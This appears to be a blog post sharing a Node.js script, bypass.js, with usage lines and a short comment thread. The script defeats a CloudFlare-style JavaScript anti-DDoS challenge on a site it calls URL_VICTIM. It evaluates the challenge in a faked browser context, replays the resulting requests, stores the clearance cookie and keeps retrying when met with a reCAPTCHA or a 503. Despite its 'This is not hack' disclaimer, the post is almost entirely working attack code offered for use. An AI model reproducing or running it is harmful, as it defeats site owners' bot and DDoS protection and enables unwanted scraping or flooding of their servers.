This is not hack
This is just the solution to the challenge
File to save cookie "aa.json"
Main require: "request, cheerio,safe-eval, tough-cookie-filestore"
Variable URL_VICTIM : by yourselfMain require: "request, cheerio,safe-eval, tough-cookie-filestore"
File: bypass.js:
//
var request_module = require('request');
var cheerio = require('cheerio');
var qs = require('querystring');
var safeEval = require('safe-eval');
var FileCookieStore = require('tough-cookie-filestore');
const browserMe = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36';
var URL_VICTIM= '###by_yourself###';
const file_name_1= __dirname+ '/aa.json';
if(!require('fs').existsSync(file_name_1)) require('fs').writeFileSync(file_name_1, '');
var request = request_module.defaults({
jar : request_module.jar(new FileCookieStore(file_name_1))
});
var rq= {
request,
try: 0,
calcTime: -1,
browserMe
}
var arrFetchMe= [];
function fetchMe(url, method, data){
console.log('url:', url);
arrFetchMe.push({
url,
method: method,
data
});
}
function processHTML(html, callback){
var $ = cheerio.load(html);
var bgImg= URL_VICTIM+ $('#trk_jschal_nojs').attr('style').split('\'')[1];
// console.log({bgImg});
fetchMe(bgImg);
var temp = '(function(){})();'+ $('script').last().html();
var objDivId= {
//
}
var document = {
getElementsByTagName: function(tag1){
return [
{
appendChild: function(obj){
fetchMe(obj.src);
}
}
]
},
getElementById: function(id){
if(objDivId[id]) return objDivId[id];
var jquery= $('#'+ id);
var a= {
value: jquery.attr('value'),
action: jquery.attr('action') ? URL_VICTIM+ jquery.attr('action'): undefined,
submit: function(){
// console.log(objDivId);
// console.log('url', this.action);
var a= {};
$('#'+ id+ ' input').each(function(){
var b= $(this).attr('id');
a[$(this).attr('name')]= (objDivId[b] || {}).value || $(this).attr('value');
})
fetchMe(this.action, 'POST', a);
},
style: {},
jquery,
innerHTML: jquery.html()
};
objDivId[id]= a;
return objDivId[id];
},
body: {
appendChild: function(objEl){
// console.log(objEl);
// request to objEl.obj.src
if(objEl && objEl.obj && objEl.obj.src) fetchMe(objEl.obj.src);
}
},
attachEvent: function(flag, fn){
fn();
},
createElement: function(){
return {
innerHTML: '',
firstChild: {
href: URL_VICTIM+ '/'
},
obj: {},
setAttribute: function(tag, val){
this.obj[tag]= tag=='src' ? (
URL_VICTIM+ val
) : val;
}
}
},
addEventListener: function(flag, fn, trueFalse) {
fn();
}
};
var navigator = {
cookieEnabled: true,
userAgent: browserMe
}
var context = {
document: document,
location: {hash: ''},
window : {
'addEventListener' : 1,
navigator
},
navigator,
setTimeout: function(fn, ms){
// setTimeout(fn, ms);
fn();
},
setInterval: function(){
return 1+ Math.floor(Math.random()*10);
}
};
try{
safeEval(temp, context);
}
catch(_ex){
return callback(_ex);
}
// console.log(arrFetchMe);
request({
url: arrFetchMe[0].url,
headers: {
'Referer': URL_VICTIM+ '/',
'User-Agent': browserMe
}
}, function(_er0, _res0){
//
});
request({
url: arrFetchMe[1].url,
headers: {
'Referer': URL_VICTIM+ '/',
'User-Agent': browserMe
}
}, function(_er0, _res0){
//
});
var meLen= arrFetchMe.length -1;
if(arrFetchMe[meLen] && arrFetchMe[meLen].data){
var x= arrFetchMe[meLen], dataString= '', start0= 0;
Object.keys(x.data).forEach(function(el){
var a= x.data[el];
if(!start0){
start0= 1;
} else dataString+= '&';
dataString+= ''+ el+ '='+ x.data[el];
});
console.log({dataString});
var opt2 = {
url: x.url,
headers: {
'Referer': URL_VICTIM+ '/',
'User-Agent': browserMe,
'Content-Type': 'application/x-www-form-urlencoded',
},
method: 'POST',
body: dataString
};
callback(null, opt2);
} else {
callback({message: 'html ddos cloudflare change?'});
}
};
function poolWeb(html, timeOut, callbackDone){
processHTML(html, function(err, opt2){
function callNext(){
var timeOut_calc= Math.max(20, timeOut+ 1000);
mainAction(timeOut_calc, callbackDone);
}
if(err){
console.log(err.message);
callNext();
return;
}
setTimeout(function(){
var fileName = file_name_1;
function callbackRequest(err2, res2, html2) {
if(err2) return callNext();
var x = res2.statusCode;
if(x==403){
// require('fs').writeFileSync('./g-capcha.html', html2);
console.log('g-recapcha');
if(rq.try%5 == 4) require('fs').writeFileSync(fileName, '');
rq.try++;
callNext();
}
else if(x==503){
console.log('why enable javascript...');
if(rq.try%5 == 4) require('fs').writeFileSync(fileName, '');
callNext();
}
else if(x==200){
console.log('oke 1');
rq.try= 0;
rq.ok= true; if(callbackDone) callbackDone(0);
} else callNext();
}
request(opt2, callbackRequest);
}, timeOut);
})
}
function mainAction(timeOut, callbackDone){
var options = {
url: URL_VICTIM+ '/',
timeout: 5000,
headers: {
'User-Agent': browserMe
}
};
request(options , function (error, response, html) {
if (!error && response.statusCode == 200) {
console.log('oke 0');
//require('fs').writeFileSync('./app2.html', html);
rq.ok= true;
rq.try= 0;
if(callbackDone) callbackDone(0);
}
else if(error) console.error(error);
else{
var x = response.statusCode;
console.log({
"note": 'fail 1st',
"resCode": response.statusCode
})
if(x==503) poolWeb(html, timeOut, callbackDone);
}
});
}
// mainAction(9000);
rq.mainAction= mainAction;
module.exports= rq;
//
USE://
const rq= require('./bypass.js');
var request;
if(!rq.ok) {
rq.mainAction(9000, function(_done){
request= rq.request;
});
}
else request= rq.request;
i really like this article please keep it up. Log4Shell
ReplyDeleteU are welcome
Delete